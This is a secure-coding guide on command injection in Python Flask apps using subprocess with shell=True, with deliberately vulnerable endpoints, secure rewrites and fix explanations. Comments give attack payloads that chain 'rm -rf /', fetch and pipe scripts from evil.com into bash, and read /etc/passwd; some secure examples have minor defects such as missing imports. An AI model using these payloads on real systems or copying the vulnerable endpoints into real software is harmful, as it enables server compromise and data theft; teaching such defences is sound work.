Command injection from HTTP request data in subprocess call

Critical Risk command-injection
pythoncommand-injectionsubprocessshellhttp-requestrce

What it is

A critical security vulnerability where untrusted request data is passed into a command string or executed with shell=True, allowing shell metacharacters to change the intended command. Command injection allows arbitrary system command execution, enabling data exfiltration, privilege escalation, and full server compromise.

import subprocess
import os
from flask import Flask, request, jsonify

app = Flask(__name__)

# VULNERABLE: Flask endpoints with subprocess injection
@app.route('/backup', methods=['POST'])
def backup_file():
    data = request.get_json()
    source = data.get('source', '')
    destination = data.get('destination', '/backup/')
    
    if not source:
        return jsonify({'error': 'Source file required'}), 400
    
    try:
        # VULNERABLE: shell=True with user input
        command = f"cp {source} {destination}"
        result = subprocess.run(command, shell=True, 
                              capture_output=True, text=True)
        
        if result.returncode == 0:
            return jsonify({'success': True, 'message': 'Backup completed'})
        else:
            return jsonify({'error': result.stderr}), 500
            
    except Exception as e:
        return jsonify({'error': str(e)}), 500

@app.route('/process', methods=['GET'])
def process_file():
    filename = request.args.get('file', '')
    operation = request.args.get('op', 'cat')
    options = request.args.get('options', '')
    
    if not filename:
        return jsonify({'error': 'Filename required'}), 400
    
    # VULNERABLE: Multiple user inputs in shell command
    command = f"{operation} {options} {filename}"
    
    try:
        # DANGEROUS: Arbitrary command execution
        result = subprocess.run(command, shell=True,
                              capture_output=True, text=True,
                              timeout=30)
        
        return jsonify({
            'output': result.stdout,
            'error': result.stderr,
            'returncode': result.returncode
        })
        
    except subprocess.TimeoutExpired:
        return jsonify({'error': 'Command timeout'}), 500
    except Exception as e:
        return jsonify({'error': str(e)}), 500

@app.route('/analyze', methods=['POST'])
def analyze_data():
    data = request.get_json()
    input_file = data.get('input_file', '')
    analyzer = data.get('analyzer', 'file')
    args = data.get('args', [])
    
    # VULNERABLE: User controls analyzer and arguments
    command_parts = [analyzer] + args + [input_file]
    command = ' '.join(command_parts)
    
    try:
        # DANGEROUS: Shell execution with user-controlled command
        process = subprocess.Popen(command, shell=True,
                                 stdout=subprocess.PIPE,
                                 stderr=subprocess.PIPE,
                                 text=True)
        
        stdout, stderr = process.communicate(timeout=60)
        
        return jsonify({
            'analysis': stdout,
            'errors': stderr,
            'exit_code': process.returncode
        })
        
    except Exception as e:
        return jsonify({'error': str(e)}), 500

if __name__ == '__main__':
    app.run(debug=True)

# Attack examples:
# POST /backup {"source": "file.txt; rm -rf /; curl evil.com/steal", "destination": "/tmp"}
# GET /process?file=/etc/passwd&op=cat&options=; wget evil.com/backdoor.py;
# POST /analyze {"analyzer": "sh", "args": ["-c"], "input_file": "curl evil.com/malware | bash"}
import subprocess
import hashlib
import os
import re
from pathlib import Path
from typing import Dict, List, Any, Optional
from flask import Flask, request, jsonify
import logging

# Configure logging
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)

app = Flask(__name__)

class SecureFileProcessor:
    ALLOWED_OPERATIONS = {
        'backup': {'method': 'native_copy'},
        'info': {'method': 'native_stat'},
        'hash': {'method': 'native_hash'},
        'count': {'method': 'subprocess', 'command': ['wc', '-l']},
        'validate': {'method': 'subprocess', 'command': ['file']}
    }
    
    ALLOWED_DIRS = [
        Path('/secure/uploads').resolve(),
        Path('/secure/documents').resolve()
    ]
    
    BACKUP_DIR = Path('/secure/backup').resolve()
    MAX_FILE_SIZE = 10 * 1024 * 1024  # 10MB
    
    def __init__(self):
        # Ensure directories exist
        for directory in self.ALLOWED_DIRS + [self.BACKUP_DIR]:
            directory.mkdir(parents=True, exist_ok=True)
    
    def process_request(self, operation: str, filename: str, 
                      options: Optional[Dict] = None) -> Dict[str, Any]:
        try:
            # Validate operation
            if operation not in self.ALLOWED_OPERATIONS:
                raise ValueError(f'Operation not allowed: {operation}')
            
            # Validate and resolve file path
            file_path = self._validate_file_path(filename)
            
            # Execute operation
            op_config = self.ALLOWED_OPERATIONS[operation]
            
            if op_config['method'] == 'native_copy':
                return self._native_copy(file_path, options or {})
            elif op_config['method'] == 'native_stat':
                return self._native_stat(file_path)
            elif op_config['method'] == 'native_hash':
                return self._native_hash(file_path)
            elif op_config['method'] == 'subprocess':
                return self._safe_subprocess(op_config['command'], file_path)
            else:
                raise ValueError('Unknown operation method')
                
        except Exception as e:
            logger.error(f'File processing error: {e}')
            raise
    
    def _validate_file_path(self, filename: str) -> Path:
        # Strict filename validation
        if not re.match(r'^[a-zA-Z0-9._-]+$', filename):
            raise ValueError('Invalid filename format')
        
        if len(filename) > 255:
            raise ValueError('Filename too long')
        
        if '..' in filename:
            raise ValueError('Directory traversal not allowed')
        
        # Find file in allowed directories
        for allowed_dir in self.ALLOWED_DIRS:
            candidate_path = (allowed_dir / filename).resolve()
            
            # Ensure path is within allowed directory
            if not str(candidate_path).startswith(str(allowed_dir)):
                continue
                
            # Check if file exists and is accessible
            if candidate_path.exists() and candidate_path.is_file():
                # Check file size
                if candidate_path.stat().st_size > self.MAX_FILE_SIZE:
                    raise ValueError('File too large')
                
                return candidate_path
        
        raise ValueError('File not found in allowed directories')
    
    def _native_copy(self, source_path: Path, options: Dict) -> Dict[str, Any]:
        # Generate unique backup filename
        timestamp = int(time.time())
        backup_name = f"{source_path.stem}_{timestamp}{source_path.suffix}.bak"
        backup_path = self.BACKUP_DIR / backup_name
        
        # SECURE: Native Python file copy
        import shutil
        shutil.copy2(source_path, backup_path)
        
        return {
            'operation': 'backup',
            'success': True,
            'source': source_path.name,
            'backup': backup_name,
            'size': backup_path.stat().st_size
        }
    
    def _native_stat(self, file_path: Path) -> Dict[str, Any]:
        stat = file_path.stat()
        
        return {
            'operation': 'info',
            'filename': file_path.name,
            'size': stat.st_size,
            'size_human': self._format_size(stat.st_size),
            'modified': stat.st_mtime,
            'permissions': oct(stat.st_mode)[-3:],
            'is_readable': os.access(file_path, os.R_OK),
            'is_writable': os.access(file_path, os.W_OK)
        }
    
    def _native_hash(self, file_path: Path) -> Dict[str, Any]:
        algorithms = ['md5', 'sha1', 'sha256']
        hashes = {}
        
        with open(file_path, 'rb') as f:
            content = f.read()
        
        for algo in algorithms:
            hasher = hashlib.new(algo)
            hasher.update(content)
            hashes[algo] = hasher.hexdigest()
        
        return {
            'operation': 'hash',
            'filename': file_path.name,
            'size': len(content),
            'hashes': hashes
        }
    
    def _safe_subprocess(self, base_command: List[str], 
                        file_path: Path) -> Dict[str, Any]:
        # SECURE: Subprocess with argument list
        command = base_command + [str(file_path)]
        
        try:
            result = subprocess.run(
                command,  # Command as list - no shell interpretation
                capture_output=True,
                text=True,
                timeout=30,
                cwd=str(file_path.parent)  # Safe working directory
            )
            
            return {
                'operation': 'subprocess',
                'command': ' '.join(base_command),
                'filename': file_path.name,
                'stdout': result.stdout,
                'stderr': result.stderr,
                'returncode': result.returncode,
                'success': result.returncode == 0
            }
            
        except subprocess.TimeoutExpired:
            raise RuntimeError('Command execution timeout')
        except Exception as e:
            raise RuntimeError(f'Command execution failed: {e}')
    
    def _format_size(self, size: int) -> str:
        for unit in ['B', 'KB', 'MB', 'GB']:
            if size < 1024.0:
                return f"{size:.1f} {unit}"
            size /= 1024.0
        return f"{size:.1f} TB"

# Initialize processor
processor = SecureFileProcessor()

# SECURE: Flask endpoints with proper validation
@app.route('/backup', methods=['POST'])
def backup_file():
    try:
        data = request.get_json()
        if not data:
            return jsonify({'error': 'JSON data required'}), 400
        
        filename = data.get('source', '').strip()
        if not filename:
            return jsonify({'error': 'Source filename required'}), 400
        
        result = processor.process_request('backup', filename)
        return jsonify(result)
        
    except ValueError as e:
        return jsonify({'error': str(e)}), 400
    except Exception as e:
        logger.error(f'Backup error: {e}')
        return jsonify({'error': 'Backup operation failed'}), 500

@app.route('/info/<filename>', methods=['GET'])
def get_file_info(filename):
    try:
        result = processor.process_request('info', filename)
        return jsonify(result)
        
    except ValueError as e:
        return jsonify({'error': str(e)}), 400
    except Exception as e:
        logger.error(f'Info error: {e}')
        return jsonify({'error': 'Info operation failed'}), 500

@app.route('/hash/<filename>', methods=['GET'])
def calculate_hash(filename):
    try:
        result = processor.process_request('hash', filename)
        return jsonify(result)
        
    except ValueError as e:
        return jsonify({'error': str(e)}), 400
    except Exception as e:
        logger.error(f'Hash error: {e}')
        return jsonify({'error': 'Hash operation failed'}), 500

@app.route('/operations', methods=['GET'])
def list_operations():
    operations = list(processor.ALLOWED_OPERATIONS.keys())
    return jsonify({
        'available_operations': operations,
        'allowed_directories': [str(d) for d in processor.ALLOWED_DIRS],
        'max_file_size': processor.MAX_FILE_SIZE
    })

@app.errorhandler(404)
def not_found(error):
    return jsonify({'error': 'Endpoint not found'}), 404

@app.errorhandler(500)
def internal_error(error):
    return jsonify({'error': 'Internal server error'}), 500

if __name__ == '__main__':
    import time
    app.run(host='127.0.0.1', port=5000, debug=False)

💡 Why This Fix Works

The vulnerable code uses shell=True with user input, allowing command injection through shell metacharacters. The secure version eliminates shell execution, uses argument lists for subprocess calls, implements comprehensive input validation, and leverages native Python operations where possible.

Why it happens

Using subprocess functions with shell=True and user-controlled input allows shell interpretation of metacharacters. This enables command injection through shell features like command chaining, pipes, and variable substitution.

Root causes

shell=True with User Input

Using subprocess functions with shell=True and user-controlled input allows shell interpretation of metacharacters. This enables command injection through shell features like command chaining, pipes, and variable substitution.

Preview example – PYTHON
import subprocess
from flask import request

# VULNERABLE: shell=True with user input
@app.route('/process')
def process_file():
    filename = request.args.get('file', '')
    
    # DANGEROUS: Shell interpretation enabled
    result = subprocess.run(f"cat {filename}", 
                          shell=True, 
                          capture_output=True, 
                          text=True)
    
    return result.stdout

# Attack: GET /process?file=/etc/passwd; wget evil.com/steal

Command String Construction

Building command strings through concatenation or formatting with user input creates injection points. Even when shell=False, improper command construction can lead to argument injection.

Preview example – PYTHON
import subprocess

# VULNERABLE: Command string with user input
def backup_file(source, destination):
    # DANGEROUS: String formatting with user input
    command = f"cp {source} {destination}"
    
    # Still vulnerable even with shell=False if command is a string
    result = subprocess.run(command, shell=True)
    
    return result.returncode == 0

# Attack: backup_file('file.txt; rm -rf /', '/backup/')

Fixes

1

Use Argument Lists with shell=False

Pass commands as lists of arguments with shell=False (default) to prevent shell interpretation. This treats each argument as a separate entity, preventing injection attacks.

View implementation – PYTHON
import subprocess
import shlex
from pathlib import Path

# SECURE: Argument list without shell
def process_file_safe(filename):
    # Validate filename
    if not is_valid_filename(filename):
        raise ValueError('Invalid filename')
    
    # Resolve full path and validate
    file_path = Path(filename).resolve()
    if not is_in_allowed_directory(file_path):
        raise ValueError('File not in allowed directory')
    
    # SECURE: Argument list, no shell
    result = subprocess.run(
        ['cat', str(file_path)],  # Command as list
        capture_output=True,
        text=True,
        timeout=30  # Prevent hanging
    )
    
    if result.returncode != 0:
        raise RuntimeError(f'Command failed: {result.stderr}')
    
    return result.stdout

def is_valid_filename(filename):
    import re
    pattern = r'^[a-zA-Z0-9._-]+$'
    return (re.match(pattern, filename) and 
            len(filename) <= 255 and
            '..' not in filename)

def is_in_allowed_directory(file_path):
    allowed_dirs = [Path('/uploads'), Path('/documents')]
    return any(str(file_path).startswith(str(allowed_dir)) 
              for allowed_dir in allowed_dirs)
2

Implement Input Validation and Allowlisting

Create comprehensive validation for all user inputs. Use allowlists for acceptable commands, validate file paths, and sanitize all parameters before subprocess execution.

View implementation – PYTHON
import subprocess
import re
from pathlib import Path
from typing import List, Optional

class SecureCommandExecutor:
    ALLOWED_COMMANDS = {
        'count': ['wc', '-l'],
        'checksum': ['sha256sum'],
        'info': ['file'],
        'list': ['ls', '-la']
    }
    
    ALLOWED_DIRS = [Path('/safe/uploads'), Path('/safe/documents')]
    MAX_ARGS = 5
    
    def execute_command(self, command_name: str, 
                       filename: str, 
                       extra_args: Optional[List[str]] = None) -> str:
        # Validate command
        if command_name not in self.ALLOWED_COMMANDS:
            raise ValueError(f'Command not allowed: {command_name}')
        
        # Validate filename
        validated_file = self._validate_file_path(filename)
        
        # Validate extra arguments
        validated_args = self._validate_arguments(extra_args or [])
        
        # Build command
        base_command = self.ALLOWED_COMMANDS[command_name]
        full_command = base_command + [str(validated_file)] + validated_args
        
        # Execute safely
        try:
            result = subprocess.run(
                full_command,
                capture_output=True,
                text=True,
                timeout=30,
                check=True  # Raise exception on non-zero exit
            )
            return result.stdout
        except subprocess.CalledProcessError as e:
            raise RuntimeError(f'Command failed: {e.stderr}')
        except subprocess.TimeoutExpired:
            raise RuntimeError('Command timeout')
    
    def _validate_file_path(self, filename: str) -> Path:
        # Basic filename validation
        if not re.match(r'^[a-zA-Z0-9._-]+$', filename):
            raise ValueError('Invalid filename format')
        
        if len(filename) > 255:
            raise ValueError('Filename too long')
        
        # Resolve path and check directory
        for allowed_dir in self.ALLOWED_DIRS:
            try:
                file_path = (allowed_dir / filename).resolve()
                if str(file_path).startswith(str(allowed_dir.resolve())):
                    if file_path.exists() and file_path.is_file():
                        return file_path
            except (OSError, ValueError):
                continue
        
        raise ValueError('File not found in allowed directories')
    
    def _validate_arguments(self, args: List[str]) -> List[str]:
        if len(args) > self.MAX_ARGS:
            raise ValueError('Too many arguments')
        
        validated = []
        for arg in args:
            if not self._is_safe_argument(arg):
                raise ValueError(f'Unsafe argument: {arg}')
            validated.append(arg)
        
        return validated
    
    def _is_safe_argument(self, arg: str) -> bool:
        # Length check
        if len(arg) > 100:
            return False
        
        # Pattern check - only safe characters
        if not re.match(r'^[a-zA-Z0-9._/-]+$', arg):
            return False
        
        # No shell metacharacters
        dangerous_chars = [';', '|', '&', '$', '`', '(', ')', '<', '>', '*', '?']
        return not any(char in arg for char in dangerous_chars)
3

Use Native Python Libraries

Replace subprocess calls with native Python libraries whenever possible. Use built-in modules for file operations, text processing, and data manipulation to avoid command injection entirely.

View implementation – PYTHON
import hashlib
import os
from pathlib import Path
from typing import Dict, Any

# SECURE: Native Python alternatives
class NativeFileProcessor:
    def __init__(self, allowed_dirs: List[str]):
        self.allowed_dirs = [Path(d).resolve() for d in allowed_dirs]
    
    def process_file(self, operation: str, filename: str) -> Dict[str, Any]:
        # Validate and resolve file path
        file_path = self._validate_file_path(filename)
        
        # Execute operation using native Python
        operations = {
            'count_lines': self._count_lines,
            'calculate_hash': self._calculate_hash,
            'get_info': self._get_file_info,
            'read_content': self._read_content
        }
        
        if operation not in operations:
            raise ValueError(f'Operation not supported: {operation}')
        
        return operations[operation](file_path)
    
    def _count_lines(self, file_path: Path) -> Dict[str, Any]:
        try:
            with open(file_path, 'r', encoding='utf-8') as f:
                line_count = sum(1 for _ in f)
            
            return {
                'operation': 'count_lines',
                'file': file_path.name,
                'lines': line_count
            }
        except UnicodeDecodeError:
            raise ValueError('File contains binary data')
    
    def _calculate_hash(self, file_path: Path) -> Dict[str, Any]:
        hash_algorithms = ['md5', 'sha1', 'sha256']
        hashes = {}
        
        with open(file_path, 'rb') as f:
            content = f.read()
            
        for algo in hash_algorithms:
            hasher = hashlib.new(algo)
            hasher.update(content)
            hashes[algo] = hasher.hexdigest()
        
        return {
            'operation': 'calculate_hash',
            'file': file_path.name,
            'size': len(content),
            'hashes': hashes
        }
    
    def _get_file_info(self, file_path: Path) -> Dict[str, Any]:
        stat = file_path.stat()
        
        return {
            'operation': 'get_info',
            'file': file_path.name,
            'size': stat.st_size,
            'modified': stat.st_mtime,
            'permissions': oct(stat.st_mode)[-3:],
            'is_readable': os.access(file_path, os.R_OK),
            'is_writable': os.access(file_path, os.W_OK)
        }
    
    def _read_content(self, file_path: Path, max_size: int = 1024*1024) -> Dict[str, Any]:
        if file_path.stat().st_size > max_size:
            raise ValueError('File too large to read')
        
        try:
            with open(file_path, 'r', encoding='utf-8') as f:
                content = f.read()
            
            return {
                'operation': 'read_content',
                'file': file_path.name,
                'content': content,
                'size': len(content)
            }
        except UnicodeDecodeError:
            raise ValueError('File contains binary data')
    
    def _validate_file_path(self, filename: str) -> Path:
        # Validation logic similar to previous example
        import re
        
        if not re.match(r'^[a-zA-Z0-9._-]+$', filename):
            raise ValueError('Invalid filename format')
        
        for allowed_dir in self.allowed_dirs:
            candidate_path = (allowed_dir / filename).resolve()
            if (str(candidate_path).startswith(str(allowed_dir)) and
                candidate_path.exists() and candidate_path.is_file()):
                return candidate_path
        
        raise ValueError('File not found in allowed directories')

Detect This Vulnerability in Your Code

Sourcery automatically identifies command injection from http request data in subprocess call and many other security issues in your codebase.